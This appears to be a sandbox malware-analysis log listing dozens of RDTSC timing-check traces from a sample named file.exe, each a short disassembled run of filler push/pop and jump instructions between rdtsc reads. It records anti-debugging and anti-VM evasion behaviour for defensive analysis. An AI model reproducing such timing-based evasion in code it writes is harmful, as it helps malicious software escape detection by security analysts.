Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C222B7 second address: C222BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C222BD second address: C222C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C224CF second address: C224D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C224D5 second address: C224D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C22651 second address: C22657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C22657 second address: C2266E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007FF2D4EC6CACh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C229F3 second address: C229F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C22AE3 second address: C22AE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C22AE9 second address: C22AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C22AED second address: C22B16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2D4EC6CAFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C22D6E second address: C08AB3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FF2D4D13D46h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007FF2D4D13D59h 0x00000014 call dword ptr [ebp+122D1E1Bh] 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FF2D4D13D4Eh 0x00000022 jbe 00007FF2D4D13D4Eh 0x00000028 push edx 0x00000029 pop edx 0x0000002a jng 00007FF2D4D13D46h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB353 second address: BDB36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF2D4EC6CABh 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007FF2D4EC6CA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54EE6 second address: C54EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54EEA second address: C54F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4EC6CAFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF2D4EC6CADh 0x00000012 jmp 00007FF2D4EC6CB3h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55314 second address: C5531B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5531B second address: C55327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF2D4EC6CA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55327 second address: C5535C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF2D4D13D50h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jo 00007FF2D4D13D48h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FF2D4D13D46h 0x00000024 ja 00007FF2D4D13D46h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B038 second address: C5B03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B03C second address: C5B040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B040 second address: C5B057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FF2D4EC6CA8h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B057 second address: C5B061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF2D4D13D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B061 second address: C5B065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B065 second address: C5B071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF2D4D13D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B071 second address: C5B077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B077 second address: C5B096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D4Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FF2D4D13D46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B096 second address: C5B09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B331 second address: C5B345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop edi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FF2D4D13D46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B345 second address: C5B349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B9EA second address: C5B9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4D13D4Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5B9FB second address: C5BA0F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2D4EC6CA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FF2D4EC6CA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C093 second address: C5C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C099 second address: C5C0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FF2D4EC6CB2h 0x0000000b jno 00007FF2D4EC6CA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5AAAB second address: C5AAB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DC5A second address: C5DC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FF2D4EC6CB9h 0x0000000e jmp 00007FF2D4EC6CB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DC92 second address: C5DCA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF2D4D13D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DCA3 second address: C5DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEA799 second address: BEA7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FF2D4D13D5Fh 0x0000000e jmp 00007FF2D4D13D57h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEA7C0 second address: BEA7C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6607E second address: C66083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66343 second address: C6634B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66781 second address: C66796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FF2D4D13D4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66796 second address: C6679C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6679C second address: C667A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65D68 second address: C65D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65D6C second address: C65D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D56h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C65D86 second address: C65D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6CA69 second address: C6CA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6CBA4 second address: C6CBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6CBA9 second address: C6CBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FF2D4D13D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6CBB3 second address: C6CC04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2D4EC6CB3h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007FF2D4EC6CAAh 0x00000018 jc 00007FF2D4EC6CA6h 0x0000001e jmp 00007FF2D4EC6CB7h 0x00000023 popad 0x00000024 js 00007FF2D4EC6CC2h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6CC04 second address: C6CC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4D13D56h 0x00000009 jng 00007FF2D4D13D4Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6EF10 second address: C6EF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C752B6 second address: C752C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2D4D13D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C752C0 second address: C752D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF2D4EC6CAEh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C756C9 second address: C756CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C757FF second address: C7581A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF2D4EC6CB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75990 second address: C759B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jmp 00007FF2D4D13D56h 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C759B0 second address: C759BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2D4EC6CA8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C759BD second address: C759D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4D13D54h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76374 second address: C76378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76378 second address: C7638A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FF2D4D13D4Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7638A second address: C76390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76390 second address: C76396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8BAC second address: BE8BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8BB0 second address: BE8BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8BB4 second address: BE8BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8BBD second address: BE8BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C78D75 second address: C78D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007FF2D4EC6CAAh 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f js 00007FF2D4EC6CA6h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FF2D4EC6CAAh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C79354 second address: C7935A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CABD second address: C7CACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jns 00007FF2D4EC6CA6h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CACC second address: C7CAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CAD2 second address: C7CB0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CB3h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF2D4EC6CB4h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CB0B second address: C7CB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF2D4D13D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CB15 second address: C7CB25 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF2D4EC6CA6h 0x00000008 js 00007FF2D4EC6CA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CB25 second address: C7CB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CB2B second address: C7CB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CF1D second address: C7CF37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2D4D13D56h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CF37 second address: C7CF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CF3B second address: C7CF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C84957 second address: C8495D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8495D second address: C84977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4D13D4Ch 0x00000009 popad 0x0000000a pushad 0x0000000b jnp 00007FF2D4D13D46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8342C second address: C83430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8405E second address: C8406B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FF2D4D13D4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8406B second address: C84077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C84077 second address: C84082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF2D4D13D46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C84082 second address: C8409D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2D4EC6CB7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8409D second address: C840A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D673 second address: C8D683 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FF2D4EC6CACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D683 second address: C8D6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF2D4D13D51h 0x0000000b jns 00007FF2D4D13D52h 0x00000011 jmp 00007FF2D4D13D54h 0x00000016 pushad 0x00000017 jnl 00007FF2D4D13D46h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D822 second address: C8D826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D826 second address: C8D844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF2D4D13D52h 0x0000000f jne 00007FF2D4D13D46h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D844 second address: C8D848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D848 second address: C8D866 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2D4D13D60h 0x00000008 jmp 00007FF2D4D13D54h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D866 second address: C8D86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D9C5 second address: C8D9CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D9CB second address: C8D9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C963AF second address: C963B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C963B5 second address: C963C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FF2D4EC6CA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94593 second address: C945B6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2D4D13D5Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94713 second address: C94719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94719 second address: C9472C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
